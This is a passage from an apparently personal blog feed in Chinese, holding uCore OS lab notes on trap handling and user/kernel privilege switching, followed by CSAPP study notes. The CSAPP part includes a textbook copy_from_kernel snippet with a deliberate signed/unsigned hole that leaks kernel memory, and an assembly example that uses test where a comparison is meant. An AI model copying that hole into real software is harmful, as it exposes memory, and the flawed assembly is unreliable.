class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>编程完善trap.c中的中断处理函数trap，在对时钟中断进行处理的部分填写trap函数中处理时钟中断的部分，使操作系统每遇到100次时钟中断后，调用print_ticks子程序，向屏幕上打印一行文字”100 ticks”。</p><ul><li><p>这个实现还是比较简单的，具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* trap_dispatch - dispatch based on what type of trap occurred */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">trap_dispatch</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span> c;</span><br><span class="line">    <span class="keyword">switch</span> (tf-&gt;tf_trapno) &#123;</span><br><span class="line">    <span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        <span class="comment">// 全局变量ticks定义于kern/driver/clock.c</span></span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="keyword">if</span>(ticks % TICK_NUM == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">print_ticks</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="comment">// .........</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="7-扩展练习">7. 扩展练习</h3><blockquote><p>请注意：强烈建议学习完lab2中<strong>特权级切换</strong>的相关知识后再完成该扩展练习。</p></blockquote><h4 id="1-Challenge-1">1) Challenge 1</h4><blockquote><p>增加一组切换特权级的函数。当内核初始完毕后，可从内核态返回到用户态的函数，而用户态的函数又通过系统调用得到内核态的服务</p></blockquote><blockquote><p>部分讲解以注释的形式写入代码中。更详细的讲解请查看<a href="#3-%E9%80%9A%E8%BF%87%E4%B8%AD%E6%96%AD%E5%88%87%E6%8D%A2%E7%89%B9%E6%9D%83%E7%BA%A7">通过中断切换特权级</a></p></blockquote><ul><li><p>用户态转内核态</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 全局变量</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> switchk2u;</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"><span class="keyword">case</span> T_SWITCH_TOK:</span><br><span class="line">    <span class="keyword">if</span> (tf-&gt;tf_cs != KERNEL_CS) &#123;</span><br><span class="line">    <span class="comment">// 修改CPL DPL IOPL以提升特权级</span></span><br><span class="line">    tf-&gt;tf_cs = KERNEL_CS;</span><br><span class="line">    tf-&gt;tf_ds = tf-&gt;tf_es = KERNEL_DS;</span><br><span class="line">    tf-&gt;tf_eflags &amp;= ~FL_IOPL_MASK;</span><br><span class="line">    <span class="comment">// 计算将要保存新trapFrame的用户栈地址</span></span><br><span class="line">    <span class="comment">//    数值减8是因为内核调用中断时CPU没有压入ss和esp</span></span><br><span class="line">    switchu2k = (<span class="keyword">struct</span> trapframe *)(tf-&gt;tf_esp - (<span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>));</span><br><span class="line">    <span class="comment">// 将修改后的trapFrame写入用户栈(注意当前是内核栈)。注意trapFrame中ss和esp的值不需要写入。</span></span><br><span class="line">    <span class="built_in">memmove</span>(switchu2k, tf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>);</span><br><span class="line">    <span class="comment">// 设置弹出esp的值为用户栈的新地址</span></span><br><span class="line">    *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)switchu2k;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">break</span>;</span><br></pre></td></tr></table></figure></li><li><p>内核态转用户态</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 全局变量</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> *switchu2k;</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"><span class="keyword">case</span> T_SWITCH_TOU:</span><br><span class="line">    <span class="keyword">if</span> (tf-&gt;tf_cs != USER_CS) &#123;</span><br><span class="line">    <span class="comment">// 将中断的栈帧赋给临时中断帧</span></span><br><span class="line">    switchk2u = *tf;</span><br><span class="line">    <span class="comment">// 修改可执行代码段为USER_CS</span></span><br><span class="line">    switchk2u.tf_cs = USER_CS;</span><br><span class="line">    <span class="comment">// 修改数据段为USER_DS</span></span><br><span class="line">    switchk2u.tf_ds = switchk2u.tf_es = switchk2u.tf_ss = USER_DS;</span><br><span class="line">    <span class="comment">// 设置从中断处理程序返回时的栈地址</span></span><br><span class="line">    <span class="comment">//    数值减8是因为iret不会弹出ss和esp，所以不需要这8个字节</span></span><br><span class="line">    switchk2u.tf_esp = (<span class="type">uint32_t</span>)tf + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>;</span><br><span class="line">    <span class="comment">// 为了使得程序在低CPL的情况下仍然能够使用IO</span></span><br><span class="line">    <span class="comment">// 需要将eflags中对应的IOPL位置成表示用户态的3</span></span><br><span class="line">    switchk2u.tf_eflags |= FL_IOPL_MASK;</span><br><span class="line">    <span class="comment">// 设置中断处理例程结束时pop出的%esp，这样可以用修改后的数据来恢复上下文。</span></span><br><span class="line">    *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)&amp;switchk2u;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 事实上上述代码并没有实际完成一个从内核栈到用户态栈的切换</span></span><br><span class="line">    <span class="comment">// 仅仅是完成了特权级的切换。这属于正常现象。</span></span><br><span class="line"><span class="keyword">break</span>;</span><br></pre></td></tr></table></figure></li><li><p>使用int中断的代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">lab1_switch_to_user</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="string">&quot;int %0 \n&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        :</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span>(T_SWITCH_TOU)</span></span></span><br><span class="line"><span class="params"><span class="function">    )</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">lab1_switch_to_kernel</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="string">&quot;int %0 \n&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        :</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span>(T_SWITCH_TOK)</span></span></span><br><span class="line"><span class="params"><span class="function">    )</span></span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>虽然在修改特权级的代码中，修改CPL和DPL是以赋值的形式而不是以位运算的形式来修改，但内核仍然可以正常工作，因为在Lab1中，GDT中所有段描述符的基地址<strong>都是相同的值</strong>—— <strong>0</strong> 。</p></blockquote><h4 id="2-Challenge-2">2) Challenge 2</h4><blockquote><p>用键盘实现用户模式内核模式切换。具体目标是：“键盘输入3时切换到用户模式，键盘输入0时切换到内核模式”。</p></blockquote><ul><li>切换内核的代码直接照搬<code>Challenge 1</code>的代码即可。</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// in `trap_dispatch` of `trap.c`</span></span><br><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_KBD:</span><br><span class="line">    c = <span class="built_in">cons_getc</span>();</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;kbd [%03d] %c\n&quot;</span>, c, c);</span><br><span class="line">    <span class="comment">// 切换特权级的代码直接照抄之前编写的代码</span></span><br><span class="line">    <span class="keyword">if</span>(c == <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (tf-&gt;tf_cs != KERNEL_CS) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;+++ switch to  kernel  mode +++\n&quot;</span>);</span><br><span class="line">            tf-&gt;tf_cs = KERNEL_CS;</span><br><span class="line">            tf-&gt;tf_ds = tf-&gt;tf_es = KERNEL_DS;</span><br><span class="line">            tf-&gt;tf_eflags &amp;= ~FL_IOPL_MASK;</span><br><span class="line">            switchu2k = (<span class="keyword">struct</span> trapframe *)(tf-&gt;tf_esp - (<span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>));</span><br><span class="line">            <span class="built_in">memmove</span>(switchu2k, tf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>);</span><br><span class="line">            *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)switchu2k;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span>(c == <span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    &#123;</span><br><span class="line">          <span class="keyword">if</span> (tf-&gt;tf_cs != USER_CS) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;+++ switch to  user  mode +++\n&quot;</span>);</span><br><span class="line">            switchk2u = *tf;</span><br><span class="line">            switchk2u.tf_cs = USER_CS;</span><br><span class="line">            switchk2u.tf_ds = switchk2u.tf_es = switchk2u.tf_ss = USER_DS;</span><br><span class="line">            switchk2u.tf_esp = (<span class="type">uint32_t</span>)tf + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>;</span><br><span class="line">            switchk2u.tf_eflags |= FL_IOPL_MASK;</span><br><span class="line">            *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)&amp;switchk2u;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成uCore实验1时写下的一点笔记&lt;/li&gt;
&lt;li&gt;内容涉及CPU实模式、中断处理以及特权级更改等&lt;/li&gt;
&lt;li&gt;内容较多，建议使用右侧导航栏。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>CSAPP笔记</title>
    <link href="https://kiprey.github.io/2020/07/csapp/"/>
    <id>https://kiprey.github.io/2020/07/csapp/</id>
    <published>2020-07-26T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:39.945Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里存放着一点笔者阅读CSAPP所记录的笔记</li><li>由于CSAPP内容众多，这里只记录了一些笔者学习的主要点</li><li>根据笔者的进度，持续更新。单次更新随缘记录。</li></ul><span id="more"></span><h2 id="一、-计算机系统漫游">一、 计算机系统漫游</h2><ul><li>在计算机世界中，<strong>信息</strong> 就是位(bit) + 上下文。在不同的上下文中，其数据也会表示出不同的意思。<br>例如：<ul><li>在一串数字中，0x90表示154</li><li>在一串机器码中，0x90表示nop指令</li><li>在 一串字符串中，0x90表示一个特殊的字符</li></ul></li><li>代码语言可以被其他程序翻译为不同的格式。以C语言为例，其中可以分为如下几个阶段<ul><li><strong>预处理阶段</strong>。 预处理器(cpp)根据<code>#</code>开头的预处理命令，插入或隐藏部分代码。修改后的源代码以<code>.i</code>为后缀</li><li><strong>编译阶段</strong>。编译器(ccl)将<code>.i</code>文件编译为汇编代码<code>.s</code>文件</li><li><strong>汇编阶段</strong>。汇编器(as)读取<code>.s</code>文件并将其转换为机器语言指令，打包生成一种<em>可重定位目标指令</em>的格式，并将其保存在<code>.o</code>文件中。</li><li><strong>链接阶段</strong>。有些<code>.o</code>文件调用了某个库函数，但这个库函数的实现在另一个<code>.o</code>文件中。因此链接器(ld)需要将各种<code>.o</code>文件链接，最终生成可执行文件。</li></ul></li><li>系统的硬件由以下几个部件组成<ul><li>总线</li><li>I/O设备</li><li>主存</li><li>处理器(CPU)<ul><li>处理器执行的操作会围绕寄存器文件(register file)和算术/逻辑单元(ALU)进行。</li><li>处理器在指令的要求下可能会执行<em>加载、存储、操作、跳转</em>等操作</li></ul></li></ul></li><li>处理器的运行速度很快，但数据从主存运送到CPU里却相当的慢。这其中速度可能相差百倍以上，大大拖累了CPU的速度。<br>针对这种处理器与主存之间的差异，系统设计者引入了更小更快的存储设备——<em>高速缓存存储器</em>(cache)，这其中利用了高速缓存的<em>局部性原理</em>。</li><li>操作系统管理硬件<ul><li>我们可以将做操系统看成是应用程序和硬件之间插入的一层软件，所有应用程序对硬件的操作尝试都必须通过操作系统。</li><li>操作系统的基本功能<ul><li>防止硬件被失控的应用程序滥用。</li><li>向应用程序提供简单一致的机制来控制复杂而又通常大不相同的低级硬件设备。</li></ul></li><li>文件是对I/O设备的抽象表示，虚拟内存是对主存和磁盘I/O设备的抽象表示。进程则是对处理器、主存和I/O设备的抽象表示。</li><li><strong>进程</strong><ul><li>进程是操作系统对一个正在运行的程序的一种抽象。而<em>并发运行</em>，则是一个进程的指令和另一个进程的指令交错进行。</li><li>操作系统实现这种进程交错指令的机制称为<em>上下文切换</em>。<em>上下文</em>是操作系统保持跟踪进程运行所需的所有状态信息。</li></ul></li><li><strong>线程</strong><ul><li>一个进程实际上可以由多个称为<em>线程</em>的执行单位组成</li><li>每个线程都运行在进程的上下文中，并共享同样代码和全局数据。</li><li>多线程之间比多进程之间更容易共享数据。线程一般来说也比进程更高效。</li></ul></li><li><strong>虚拟内存</strong><ul><li>虚拟内存为每个进程提供了一个假象——即每个继承都在独占地使用主存。每个进程看到的内存都是一致的，称为<em>虚拟地址空间</em>。</li><li>虚拟内存的布局从低地址到高地址，分别为<ul><li>程序代码和数据。其中的数据包括全局变量与只读变量（例如字符串）</li><li>堆内存。当调用内存分配或释放函数时。对可以在运行时动态地扩展和收缩。</li><li>共享库。地址中间部分是一块用来存放像C标准库和数学库这样地共享库代码和数据的区域。</li><li>栈内存。位于用户虚拟地址空间顶部的是用户栈，编译器用它来实现函数调用。</li><li>内核虚拟内存。地址空间最顶部的区域是为内核保留的。不允许应用程序读/写/执行这个区域的内容。应用程序只能调用内核来执行这些操作。<br><img src="/2020/07/csapp/chapters1_vm.png" alt="img"></li></ul></li></ul></li></ul></li></ul><h2 id="二、-信息的表示和处理">二、 信息的表示和处理</h2><h3 id="1-字节顺序">1) 字节顺序</h3><ul><li>字节顺序分为<em>大端序</em>(big-endian)和<em>小端序</em>(liggle-endian)。大多数机器使用的都是小端序。<br><img src="/2020/07/csapp/chapters2_endian.png" alt="img"></li></ul><h3 id="2-补码-two’s-complement">2) 补码(two’s complement)</h3><ul><li><p>为了在正数的基础上实现负数的表达，将数据的最高位设置为符号位。当符号位为0时，当前数据表示为正数；当符号位为1时，当前数据表示为负数。</p></li><li><p>故以32位int类型为例，其正数范围为<code>0x00000001 ~ 0x7fffffff</code>；负数范围为<code>0x80000000~0xffffffff</code>.取值范围为<code>-2147483648~2147483647</code>.</p></li><li><p>取值范围不是对称的，负数的范围比正数的范围大一。故在int类型中，不是所有的负数都存在其相反数。例如以下例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(-INT_MIN == INT_MIN)</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;This meassages will always be printed.&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p><code>INT_MIN == -2147483648</code>，故<code>-INT_MIN == 2147483648 == INT_MAX + 1</code>，<code>-INT_MIN</code>范围超过int最大值，造成上溢，故最后的值还是<code>INT_MIN</code>，即<code>-INT_MIN == INT_MIN</code>。</p></li></ul><h3 id="3-有符号整数和无符号整数">3) 有符号整数和无符号整数</h3><ul><li><p>通过强制类型转换来转换无符号/有符号类型，其数据的<strong>位值不变</strong>，但改变了<strong>解释这些位的方式</strong>。</p></li><li><p>需要注意的是，尽量避免无符号/有符号类型的混用，因为这样可能会进行隐式类型转换，造成非预期的错误。例如以下漏洞代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> KSIZE 1024</span></span><br><span class="line"><span class="type">char</span> kbuf[KSIZE];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> *<span class="title">memcpy</span><span class="params">(<span class="type">void</span> *dest, <span class="type">void</span>*src, <span class="type">size_t</span> n)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">copy_from_kernel</span><span class="params">(<span class="type">void</span>* user_dest, <span class="type">int</span> maxlen)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> len = KSIZE &lt; maxlen ? KSIZE : maxlen;</span><br><span class="line">  <span class="built_in">memcpy</span>(user_dest, kbuf, len);</span><br><span class="line">  <span class="keyword">return</span> len;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当程度调用<code>copy_from_kernel</code>函数所传入的<code>maxlen</code>参数为负数时，由于隐式类型转换，最终<code>memcpy</code>里的参数<code>n</code>会是一个非常大的无符号整数，这将使程序读取到它没有被被授权的内核内存区域。</p></li></ul><h3 id="4-IEEE浮点表示">4) IEEE浮点表示</h3><ul><li><p>二进制小数表示的例子: $0.0011_2 = 0.1875_{10}$</p><ul><li>$0.0011_2 = 0\times0.1_2 + 0\times0.01_2 + 1\times0.001_2 + 1\times0.0001_2$</li><li>$0.1875_{10} = 0\times0.5_{10} + 0\times0.25_{10} + 1\times0.125_{10} + 1\times0.0625_{10}$</li><li>二进制与十进制之间的关系是一一对应的</li></ul></li><li><p>IEEE浮点标准用$V=(-1)^s\times M\times2^E$的形式来表示一个浮点数：</p><ul><li>符号(sign)，$s$决定这数是正数还是负数。</li><li>尾数(significand)，M是一个二进制小数。</li><li>阶码(exponent)， $E$的左右就是为浮点数加权，这个权重是$2^E$（阶码可为负）</li></ul></li><li><p>浮点数的位级表示方式</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">float</span>:</span><br><span class="line">位序号：   <span class="number">31</span> | <span class="number">30</span>           <span class="number">23</span> | <span class="number">22</span>                           <span class="number">0</span> |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span class="line">位表示： |  s |     exp         |       frac                     |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span class="line"></span><br><span class="line"><span class="type">double</span>:</span><br><span class="line">位序号：   <span class="number">63</span> | <span class="number">62</span>    <span class="number">52</span> | <span class="number">51</span>                                  <span class="number">0</span> |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span class="line">位表示： |  s |     exp  |                frac                   |</span><br><span class="line">        +-------------------------------------------------------+</span><br></pre></td></tr></table></figure></li><li><p>浮点数中的阶码并非真正的$2^{exp}$，而是需要减去一个偏移。该偏移为$offset = 2^{n-1} - 1$，其中n为阶码位数。</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// float类型</span></span><br><span class="line"><span class="type">int</span> offset = <span class="built_in">pow</span>(<span class="number">2</span>, <span class="number">7</span>) - <span class="number">1</span>;</span><br><span class="line"><span class="type">int</span> trueExp = exp - offset;</span><br></pre></td></tr></table></figure><p>真正的阶码为$2^{exp-offset}$</p></li><li><p>浮点数编码的值有4钟不同的情况</p><ul><li><strong>规格化</strong> 的。exp != 0 &amp;&amp; exp != 255</li><li><strong>非规格化</strong> 的。exp == 0</li><li>特殊情况<ol><li><strong>无穷大</strong> 。exp == 255 &amp;&amp; frac == 0</li><li><strong>NaN</strong> 。exp == 255 &amp;&amp; frac != 0<br><img src="/2020/07/csapp/chapters2_ieee_float_example.png" alt="img"></li></ol></li></ul></li><li><p>尽管浮点数可表达的范围较大，但当浮点数越来越大时，其精度会越来越小；当浮点数越来越小时，其精度也会越来越大。不管精度如何变化，这其中始终存在一个范围。</p><blockquote><p>浮点数无法精确表示所有的小数。大多数小数都只能近似表示，例如0.1表示为0.100000001。<br>浮点数也无法精确表示超大整数。超大整数的表示可能会丢失一些精度，例如表示的整数与预期值相差1等等。<br><img src="/2020/07/csapp/chapters2_ieee_range.png" alt="img"></p></blockquote></li><li><p>float类型最好不要与double类型的数据进行比较，否则会产生一些奇怪的错误，例如以下代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">float</span> a = <span class="number">0.1</span>;</span><br><span class="line"><span class="type">double</span> b = <span class="number">0.1</span>;</span><br><span class="line"><span class="keyword">if</span> (a == b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;1&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (a == (<span class="type">float</span>)b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;2&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> ((<span class="type">double</span>)a == b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;3&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 只输出 2</span></span><br></pre></td></tr></table></figure><p>当两个浮点数进行比较时，程序会自动将某个浮点数的类型转换成与另一个浮点数相同的类型，并比较其位级表示。 这段代码已经可以验证浮点数的不精确性。</p></li></ul><h2 id="三、-程序的机器级表示">三、 程序的机器级表示</h2><blockquote><p>常用的汇编指令暂且不表，这里只记录一些特殊的指令</p></blockquote><h3 id="1-用条件传送来实现条件分支">1) 用条件传送来实现条件分支</h3><ul><li><p>实现条件操作的传统方法是通过使用<em>控制</em>的条件转移，例如各类跳转指令。这种机制十分简单而通用。但在现代处理器上，它可能会非常低效。</p><blockquote><p>原因是现代处理器使用流水线方式来执行指令。<br>遇到条件跳转指令时，CPU会预判一条执行路径并将该路径上的指令装载进CPU里。<br>倘如预判失败，则必须清空流水线上的错误指令，而该操作会消耗大量时间，代价十分高昂。</p></blockquote></li><li><p>一种替代策略是使用数据的条件转移。这种方法计算一个条件操作的两种结果，然后根据条件是否满足从中选取一个。如果这种策略在某些情况下可行，则只需用一条简单的条件传送指令来实现。例如以下代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 原始C代码</span></span><br><span class="line"><span class="keyword">if</span>(a &gt; b)</span><br><span class="line">  a = b;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 条件转移实现条件分支</span></span><br><span class="line"><span class="comment">// %rdi: a, %rsi: b</span></span><br><span class="line">  test %rdi, %rsi</span><br><span class="line">  jle nextInst</span><br><span class="line">  mov %rdi, %rsi</span><br><span class="line">nextInst:</span><br><span class="line">  ...</span><br><span class="line"></span><br><span class="line"><span class="comment">// 条件传送实现条件分支</span></span><br><span class="line"><span class="comment">// %rdi: a, %rsi: b</span></span><br><span class="line">  test %rdi, %rsi</span><br><span class="line">  <span class="comment">// 当 %rdi &gt; %rsi时，将%rsi中的数据拷贝至%rdi中</span></span><br><span class="line">  cmovg %rdi, %rsi</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure></li></ul><h3 id="2-浮点代码">2) 浮点代码</h3><ul><li>浮点数所使用的寄存器与整型所使用的<code>%rdi,%rsi...</code>不同，它们分别是<code>%ymm0~ymm15</code>，每个<code>%ymmX</code>寄存器可以保存32字节。其中<code>%xmmX</code>寄存器是<code>%ymmX</code>寄存器的低16<strong>字节</strong>。</li></ul><blockquote><p>由于浮点数指令使用频率较低，暂且不表</p></blockquote><h2 id="四、-处理器体系结构">四、 处理器体系结构</h2><blockquote><p>该章节中，作者定义了一个简单的<code>Y86</code>指令集用于学习，以下笔记均以<code>Y86</code>指令集为基础进行记录。<br>需要注意的是，尽管书上使用<code>Y86</code>指令集进行讲解，我们仍可通过该指令集来探究现代指令集。</p></blockquote><ul><li>一个处理器支持的指令和指令的字节级编码，称为<em>指令集体系结构</em>(Instruction-Set Architecture, ISA)。</li></ul><h3 id="1-程序员可见状态">1) 程序员可见状态</h3><ul><li>程序中的每条指令都会读取或修改处理器状态的某些部分，这成为<em>程序员可见状态</em><blockquote><p>这里的<em>程序员</em>，既可以是用汇编代码写程序的人，也可以是产生机器级代码的编译器。</p></blockquote></li><li><em>可见状态</em>包括：<ul><li>RF: 程序寄存器</li><li>CC: 条件码</li><li>Stat: 程序状态。状态码指明程序是否运行正常或发生某个特殊事件。</li><li>DMEM: 内存</li><li>PC: 程序计数器</li></ul></li></ul><h3 id="2-指令编码">2) 指令编码</h3><ul><li><p>每条指令需要1~10个字节不等。其中</p></li><li><p>每条指令的第一个字节表明指示的类型。其中高4位是<em>代码</em>(code)部分，低4位是<em>功能</em>(function)部分。</p><blockquote><p>功能值只有在一组相关指令共用一个代码时才有用。</p></blockquote><p>以下是部分指令的具体字节编码</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">注：方括号中的数据，是指令第一个字节的十六进制表示</span><br><span class="line"></span><br><span class="line">整数操作指令    分支指令                    传送指令</span><br><span class="line">addq [60]     jmp [70]  jne [74]    rrmovq [20] cmovne [24]</span><br><span class="line">subq [61]     jle [71]  jge [75]    cmovle [21] cmovge [25]</span><br><span class="line">andq [62]     jl  [72]  jg  [76]    cmovl  [22] cmovg  [26]</span><br><span class="line">xorq [63]     je  [73]            